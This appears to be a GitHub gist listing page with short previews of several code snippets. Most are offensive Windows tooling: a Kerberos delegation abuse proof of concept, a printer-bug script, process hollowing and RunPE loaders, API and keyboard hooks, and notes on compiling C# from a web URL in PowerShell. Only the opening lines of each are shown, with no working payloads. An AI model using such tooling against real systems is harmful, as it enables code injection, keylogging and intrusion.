This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html | |
| # this is a *very* rough PoC | |
| import SimpleHTTPServer | |
| import SocketServer | |
| import base64 | |
| import random | |
| import struct |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample | |
| # some code from https://www.exploit-db.com/exploits/2879/ | |
| import os | |
| import sys | |
| import argparse | |
| import binascii | |
| import ConfigParser |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| ================================ Compile as a .Net DLL ============================== | |
| C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs | |
| */ | |
| using System.Windows.Forms; | |
| namespace TestNamespace |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 -*- | |
| #test on python 3.4 ,python of lower version has different module organization. | |
| import http.server | |
| from http.server import HTTPServer, BaseHTTPRequestHandler | |
| import socketserver | |
| PORT = 8080 | |
| Handler = http.server.SimpleHTTPRequestHandler |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/ | |
| # generate server.xml with the following command: | |
| # openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes | |
| # run as follows: | |
| # python simple-https-server.py | |
| # then in your browser, visit: | |
| # https://localhost:4443 | |
| import http.server |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /*************** | |
| * Simple Process Hollowing in C# | |
| * | |
| * #Build Your Binaries | |
| * c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe | |
| * | |
| * @author: Michael Gorelik <smgorelik@gmail.com> | |
| * gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75 | |
| * #Most of the code taken from here: @github: github.com/ambray |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Runtime.InteropServices; | |
| public class FxHook:IDisposable { | |
| const int nBytes = 5; | |
| IntPtr addr; | |
| Protection old; | |
| byte[] src = new byte[5]; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| public static class DynamicCallRunPE | |
| { | |
| private delegate bool CreateProcess_Delegate(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes, bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, IntPtr startupInfo, IntPtr processInformation); | |
| private delegate bool ThreadContext_Delegate(IntPtr thread, int[] context); | |
| private delegate bool ProcessMemoryIntPtr_Delegate(IntPtr process, int baseAddress, IntPtr buffer, int bufferSize, int bytesRead); | |
| private delegate bool ProcessMemoryByte_Delegate(IntPtr process, int baseAddress, byte[] buffer, int bufferSize, int bytesRead); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| using System.Windows.Forms; | |
| /// <summary> | |
| /// Low Level mouse and keyboard hook wrapper | |
| /// Made by BahNahNah | |
| /// </summary> | |
| public class LowLevelHook |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-) | |
| These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs. | |
| Basic gist after running PS script statements: | |
| - Loads C# project from file or web URL | |
| - Create various tmp files | |
| - Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"] | |
| - Comvert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"] |